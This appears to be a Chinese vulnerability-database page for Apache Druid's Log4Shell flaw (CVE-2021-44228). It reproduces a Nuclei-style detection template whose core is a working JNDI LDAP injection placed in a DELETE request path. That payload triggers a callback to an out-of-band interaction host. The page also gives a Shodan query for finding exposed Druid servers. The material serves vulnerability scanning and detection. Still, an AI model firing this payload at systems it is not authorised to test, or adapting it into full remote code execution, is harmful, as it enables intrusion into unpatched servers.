apache-druid-log4j-rce: Apache Druid - Remote Code Execution (Apache Log4j)

日期: 2025-08-01 | 影响软件: Apache Druid | POC: 已公开

漏洞描述

Apache Druid is vulnerable to RCE due to Log4j.

PoC代码[已公开]

id: apache-druid-log4j-rce

info:
  name: Apache Druid - Remote Code Execution (Apache Log4j)
  author: SleepingBag945
  severity: critical
  description: Apache Druid is vulnerable to RCE due to Log4j.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2021-44228
    cwe-id: CWE-502
    cpe: cpe:2.3:a:apache:druid:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Apache Druid"
    product: druid
    vendor: apache
  tags: cve,cve2021,rce,jndi,log4j,apache,druid,oast,kev,vuln

http:
  - method: DELETE
    path:
      - "{{BaseURL}}/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 404
# digest: 4a0a00473045022100f513f43c58c2050212ed809a42feb07aa73ce910533eb6040dc3f564184dceb5022024588fbb2177035a8e743b6f62c690c8ca7d612b784952fc15e60c9756fae5fe:922c64590222798bb761d5b6d8e72950

相关漏洞推荐